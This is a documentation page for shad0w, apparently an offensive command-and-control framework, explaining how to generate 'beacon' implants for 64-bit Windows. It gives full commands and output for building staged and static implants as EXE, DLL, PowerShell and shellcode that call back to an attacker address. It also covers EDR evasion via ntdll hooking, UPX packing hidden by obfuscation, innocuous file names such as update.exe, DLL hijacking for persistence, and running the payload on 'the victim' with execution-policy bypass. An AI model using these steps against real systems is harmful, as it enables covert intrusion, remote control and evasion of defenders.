-
Notifications
You must be signed in to change notification settings - Fork 335
Beacons
shad0w implants are called beacons. There are two types of beacons:
- Secure beacons are designed to operate in environments where it is vital to remain undetected.
- Insecure beacons are for environments where security is much more relaxed.
shad0w beacon --help
usage: shad0w beacon [-h] -p PAYLOAD -H ADDRESS [-P PORT] [-j JITTER] -f {raw,exe,psh,dll} -o OUT [-n] [-d]
optional arguments:
-h, --help show this help message and exit
-p PAYLOAD, --payload PAYLOAD
Beacon payload to use
-H ADDRESS, --address ADDRESS
Address the beacon will connect to
-P PORT, --port PORT Port the beacon will connect on
-j JITTER, --jitter JITTER
Jitter the beacon should use when connecting back
-f {raw,exe,psh,dll}, --format {raw,exe,psh,dll}
Format to store the beacon payload as
-o OUT, --out OUT File to store the beacon in
-n, --no-shrink Leave the file at its final size, do not attempt to shrink it
-d, --debug Start debug mode
Beacons have two payload options:
- Staged payloads only contain a stub, which will download and execute the rest of the payload.
- Static payloads are self contained and store all the beacon code inside. This will cause the payload to be much larger in size.
There is also support for Metasploit reverse_https stagers, which will be covered in more detail later.
Use the -p flag to set the payload. The format consists of arch/os/secure/static.
To generate a 64-bit Windows secure staged beacon, use x64/windows/secure.
To generate a 64-bit Windows static beacon, use x64/windows/secure/static.
Currently there is only support for 64-bit Windows. In the future, there will be a much wider range of architectures and operating systems supported.
Use the -H flag to set the IP address or domain that the beacon will callback to.
This can either be a redirector or the C2 depending on your tradecraft.
Use the -p flag to set the port that the beacon will call back on.
By default, this is set to 443.
Use the -j flag to set the delay between callbacks that the beacon will make.
By default, this is set to 1 second.
Use with the -f flag to set the format of the beacon to EXE, DLL, PowerShell or shellcode.
These options correspond to exe, dll, psh and raw respectively.
Use the -o flag to set the file used to store the generated beacon.
Use the -n flag to set this option.
Because of the JSON library that beacons use, the file size can be quite large.
To reduce the file size, the EXE will be compressed via UPX.
Obfuscation methods are then leveraged to hide the fact that UPX was used.
Use the -d flag to compile the beacon in debug mode.
- Generate a 64-bit Windows secure staged beacon in EXE format.
shad0w beacon -p x64/windows/secure -H 192.168.0.20 -f exe -o update-staged.exe
The secure payload makes heavy use of new Windows features and ntdll API hooking. This can
make the payload a lot more resistant to EDR products, but can also make it more unstable.
It has been tested on:
x64 Windows 8.1, x64 Windows 10 (Pro & Enterprise)
x64 Windows Server 2019
It may work on other systems as well.
[+] Created update.exe (340992 bytes)
- Generate a 64-bit Windows secure static beacon in EXE format.
shad0w beacon -p x64/windows/secure/static -H 192.168.0.20 -f exe -o update.exe
The secure payload makes heavy use of new Windows features and ntdll API hooking. This can
make the payload a lot more resistant to EDR products, but can also make it more unstable.
It has been tested on:
x64 Windows 8.1, x64 Windows 10 (Pro & Enterprise)
x64 Windows Server 2019
It may work on other systems as well.
Static payloads can be very large and much easier to detect. For use in droppers, loaders,
exploits, etc, staged payloads are recommended as they are much smaller and easier to use.
[+] Created update.exe (379392 bytes)
- Generate a 64-bit Windows secure static beacon in DLL format.
This payload can be used for persistence or DLL hijacking.
shad0w beacon -p x64/windows/secure/static -H 192.168.0.20 -f dll -o update.dll
The secure payload makes heavy use of new Windows features and ntdll API hooking. This can
make the payload a lot more resistant to EDR products, but can also make it more unstable.
It has been tested on:
x64 Windows 8.1, x64 Windows 10 (Pro & Enterprise)
x64 Windows Server 2019
It may work on other systems as well.
Static payloads can be very large and much easier to detect. For use in droppers, loaders,
exploits, etc, staged payloads are recommended as they are much smaller and easier to use.
[+] Created update.dll (462320 bytes)
To execute locally on the victim:
C:\Users\lee\Downloads>rundll32 update.dll,x
You will see a pop-up error message. If you click on OK, you will lose your beacon.
This execution method is just for testing the payload and is not for use in the real world.
- Generate a 64-bit Windows secure static beacon in PowerShell format.
shad0w beacon -p x64/windows/secure/static -H 192.168.0.20 -f psh -o update.ps1
To execute locally on the victim:
C:\Users\lee\Downloads>powershell -nop -exec bypass
PS C:\Users\lee\Downloads>.\update.ps1
- Generate a 64-bit Windows secure static beacon in shellcode format.
shad0w beacon -p x64/windows/secure/static -H 192.168.0.20 -f raw -o update.bin
- Generate a 64-bit Windows secure staged beacon in shellcode format.
shad0w beacon -p x64/windows/secure -H 192.168.0.20 -f raw -o update-staged.bin